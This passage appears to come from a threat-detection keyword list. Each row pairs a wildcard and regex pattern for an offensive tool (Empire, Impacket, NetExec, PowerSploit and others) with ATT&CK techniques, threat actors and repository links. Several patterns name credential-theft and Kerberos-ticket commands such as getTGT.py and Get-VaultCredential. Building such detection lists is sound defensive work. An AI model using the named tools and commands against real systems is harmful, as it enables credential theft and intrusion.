Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SQLSysadminCheck*",".{0,1000}Get\-SQLSysadminCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getST.py * -spn *",".{0,1000}getST\.py\s.{0,1000}\s\-spn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getST.py -k -no-pass -spn*",".{0,1000}getST\.py\s\-k\s\-no\-pass\s\-spn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - 
T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getST.py -spn *",".{0,1000}getST\.py\s\-spn\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*GetSyscallStub.nim*",".{0,1000}GetSyscallStub\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*Get-System.ps1*",".{0,1000}Get\-System\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SystemDNSServer.ps1*",".{0,1000}Get\-SystemDNSServer\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SystemNamedPipe*",".{0,1000}Get\-SystemNamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-TeamsChat *",".{0,1000}Get\-TeamsChat\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Get-TeamsChat*Downloads full Teams chat conversations*",".{0,1000}Get\-TeamsChat.{0,1000}Downloads\sfull\sTeams\schat\sconversations.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation 
tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*getTGT.py -dc-ip *",".{0,1000}getTGT\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getTGT.py -dc-ip*",".{0,1000}getTGT\.py\s\-dc\-ip.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*getTGT.py*",".{0,1000}getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*gettgtpkinit.py -cert-pfx *",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*gettgtpkinit.py -cert-pfx*",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py -pfx-base64 *",".{0,1000}gettgtpkinit\.py\s\-pfx\-base64\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gettgtpkinit.py*",".{0,1000}gettgtpkinit\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 
T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*Getting permissions of sensitive files.*",".{0,1000}Getting\spermissions\sof\ssensitive\sfiles\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*Getting the Obfuscated JS Code*",".{0,1000}Getting\sthe\sObfuscated\sJS\sCode.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*Get-TrustTicket.ps1*",".{0,1000}Get\-TrustTicket\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Get-UnattendSensitiveData*",".{0,1000}Get\-UnattendSensitiveData.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - 
T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*get-unixUserPassword.py*",".{0,1000}get\-unixUserPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Get-USBKeystrokes*",".{0,1000}Get\-USBKeystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-UserBadPwdCount*",".{0,1000}Get\-UserBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-userPassword.py*",".{0,1000}get\-userPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Get-UserPrivileges*",".{0,1000}Get\-UserPrivileges.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - 
T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-UserPRTToken*",".{0,1000}Get\-UserPRTToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetUserSPNs.*",".{0,1000}GetUserSPNs\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*GetUserSPNs.py*",".{0,1000}GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*GetUserSPNs.vbs*",".{0,1000}GetUserSPNs\.vbs.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*getusrdompwinfo 
*;quit*",".{0,1000}getusrdompwinfo\s.{0,1000}\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-VaultCredential.ps1*",".{0,1000}Get\-VaultCredential\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-VaultCreds*",".{0,1000}Get\-VaultCreds.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-VolumeShadowCopy*",".{0,1000}Get\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-WebCredentials*",".{0,1000}Get\-WebCredentials.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-WebCredentials.ps1*",".{0,1000}Get\-WebCredentials\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" 